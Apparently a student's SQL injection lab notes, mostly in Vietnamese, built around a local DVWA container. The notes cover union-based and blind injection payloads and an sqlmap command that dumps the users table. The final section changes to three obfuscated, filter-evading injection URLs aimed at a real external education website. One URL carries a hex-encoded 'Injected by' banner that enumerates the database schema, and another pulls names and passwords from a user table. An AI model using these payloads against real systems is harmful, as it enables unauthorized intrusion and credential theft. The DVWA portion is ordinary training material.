Lab 8
Lab 8
docker rm web-dvwa
docker run -d -p 80:80 --name web-dvwa vulnerables/web-dvwa (khởi chạy dvwa)
2. Medium: Input được gửi qua POST request (không hiện trên URL).
chinh thanh: "1 UNION SELECT user, password FROM users#" --> submit
3. High: Input được lưu vào Session (không truyền trực tiếp qua GET/POST).
Click here to change your id: 1' UNION SELECT user, password FROM users#
--> submit
SQL Injection Blind khác với SQL Injection ở chỗ câu lệnh SQL sẽ không trả ra một
kết quả cụ thể nào hết, do đó chúng ta phải tiến hành dò đoán các thông tin liên
quan đến database dựa trên sự khác biệt trong phản hồi (đúng/sai) của ứng dụng.
- Kiểm tra xem có xuất hiện lỗi hay không: 1’ and 1=1#
- Kiểm tra độ dài tên của database có phải bằng 4 hay không:
1’ and length(database () ) = 4; #
- Kiểm tra kí tự đầu tiên trong tên database có phải là “d” hay không:
1’ and ascii (substr(database() ,1,1)) = 100#
- Kiểm tra xem số lượng bảng trong database đó có phải là 2 hay không:
1’ and (select count(table_name) from information_schema.tables where
table_schema = database() ) = 2 #
- Kiểm tra độ dài của tên table đầu tiên trong database có phải là 9 hay không:
1’ and length(substr(select table_name form information_schema.tables where
table_schema=database() limit 0,1), 1)) = 9#
- Kiểm tra xem kí tự đầu tiên của tên bảng đầu tiên trong database có phải là “g”
hay không:
1' AND ascii(substr((SELECT table_name FROM information_schema.tables WHERE
table_schema=database() LIMIT 0,1),1,1)) = 103#
Medium: http://localhost/vulnerabilities/sqli_blind/?id=1%27%20AND%201=1%20--
+&Submit=Submit# --+&Submit=Submit
5. SQL Map
http://localhost/vulnerabilities/sqli/
sqlmap -u "http://localhost/vulnerabilities/sqli/" --
cookie="PHPSESSID=pde143ds2ed5790e6h168lijv4; security=high" --
data="id=1&Submit=Submit" -D dvwa -T users –dump
Khác 1:
Hết
---1. https://ssc.edu.in/newsdetails.php?id=26'+/*!50000union*/+/*!50000all*/+/*!
50000select*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -
---2. https://ssc.edu.in/newsdetails.php?id=-26'+/*!50000union*/+/*!50000all*/+/*!
50000select*/+1,/*!50000concat/**Alfaz
Infosec**/*/(0x223e273e3c2f7469746c653e,0x3c6c696e6b2072656c3d227374796c65736865657
42220687265663d2268747470733a2f2f646576656c6f706d656e742e67756172646972616e2e6f7267
2f7075626c69632f6f6666696369616c2d6465666163652d706167652f646570656e64656e636965732
f6373732f726f6f742e6373732220747970653d22746578742f637373223e,0x3c62723e3c62723e3c2
f666f6e743e3c7461626c6520626f726465723d2232223e3c74686561643e3c74723e3c746820636f6c
7370616e3d2232223e3c6469762069643d2267756172646972616e2d6c6f676f223e3c696d672064726
1676761626c653d2266616c736522207372633d2268747470733a2f2f652e746f7034746f702e696f2f
705f333139313072643170312e706e67222077696474683d323030206865696768743d32303020616c7
43d225370656564557053616d75726169223e3c2f6469763e3c2f74683e3c2f74723e3c74723e3c7468
20636f6c7370616e3d2232223e3c683320616c69676e3d2263656e746572223e3c666f6e7420636f6c6
f723d22677265656e223e496e6a6563746564206279202d3a203c666f6e7420636f6c6f723d22726564
223e20616c66617a3c2f666f6e743e,0x20496E666F736563,0x3c2f68333e3c2f74683e3c2f74723e,
0x3c74723e3c746820636f6c7370616e3d2232223e3c64697620616c69676e3d226c656674223e3c666
f6e7420636f6c6f723d626c75653e56657273696f6e203d3d3d3d3e203c666f6e7420636f6c6f723d72
65643e,/*!50000VerSiOn/**Abbarh**/*/
(),0x3c74723e3c746820636f6c7370616e3d2232223e3c64697620616c69676e3d226c656674223e3c
666f6e7420636f6c6f723d626c75653e55736572203d3d3e203c666f6e7420636f6c6f723d7265643e,
/*!50000UsEr/**Alfaz
Infosec**/*/(),0x3c2f74683e3c2f74723e,0x3c74723e3c746820636f6c7370616e3d2232223e3c6
4697620616c69676e3d226c656674223e3c666f6e7420636f6c6f723d626c75653e4461746162617365
203d3d3d3e203c666f6e7420636f6c6f723d7265643e,/*!50000DaTabaSe/**Alfaz
Infosec**/*/(),0x3c2f74683e3c2f74723e,0x3c74723e3c746820636f6c7370616e3d2232223e3c6
4697620616c69676e3d2263656e746572223e3c666f6e7420636f6c6f723d7265643e546f74616c2044
617461626173653c2f74723e3c2f74683e3c74723e3c746820636f6c7370616e3d2232223e,
(SeLECT(@w)/*!50000FrOM/**Alfaz Infosec**/*/(/*!50000SeLECT/**Abbarh**/*/(@w:=0x00)
,(SeLECT(@w)/*!50000FrOM/**Alfaz Infosec**/*/(/*!50000InFOrMATIoN_SChEmA/**Alfaz
Infosec**/*/.SCheMaTA)/*!50000WhErE/**Alfaz
Infosec**/*/(@w)IN(@w:=/*!50000CoNCaT/**Alfaz
Infosec**/*/(0x20,@w,0x3c64697620616c69676e3d226c656674223e3c666f6e7420636f6c6f723d
626c75653e,/*!50000sCheMa_NaMe/**Alfaz
Infosec**/*/,0x3c62723e))))w),0x3c2f74683e3c2f74723e,0x3c74723e3c746820636f6c737061
6e3d2232223e3c64697620616c69676e3d2263656e746572223e3c666f6e7420636f6c6f723d7265643
e557365722050726976696c6567653c2f74683e3c2f74723e,0x3c74723e3c74683e3c64697620616c6
9676e3d2263656e746572223e3c666f6e7420636f6c6f723d6379616e3e4e616d65204f66205461626c
653c2f74683e3c74683e3c64697620616c69676e3d2263656e746572223e3c666f6e7420636f6c6f723
d6379616e3e4e616d65204f6620436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f
64793e,(selEct(@x)/*!50000fRom/**Alfaz Infosec**/*/(/*!50000sElect/**Alfaz
Infosec**/*/(@x:=0x00),(sElect(0)/*!From/**Alfaz Infosec**/*/(/*!
50000inforMation_schEma.coLuMns/**Alfaz Infosec**/*/)/*!50000Where/**Alfaz
Infosec**/*/(taBle_schema=/*!50000DatAbase/**Alfaz
Infosec**/*/())and(0x00)in(@x:=/*!50000coNcat/**Alfaz
Infosec***/(@x,0x3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e
2073697a653d333e,0x3c64697620616c69676e3d226c656674223e,/*!50000tAble_naMe/**Alfaz
Infosec**/*/,0x3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e20
73697a653d333e,0x3c64697620616c69676e3d226c656674223e,/*!50000colUmn_naMe/**Alfaz
Infosec**/*/,0x3c2f666f6e743e3c2f74643e3c2f74723e))))x)),3,4,5,6,7,8,9,10,11,12,13,
14,15-- -
------- 3. https://ssc.edu.in/newsdetails.php?id=-26'+/*!50000union*/+/*!
50000all*/+/*!50000select*/+1,/*!50000(SELECT(@x)FROM(SELECT(@x:=0x00)+,
(SELECT(@x)FROM(ssced1u4_sadvidya.user)WHERE(@x)IN(@x:=CONCAT(0x20,@x,name,password
,0x3c62723e))))x),*/3,4,5,6,7,8,9,10,11,12,13,14,15-- -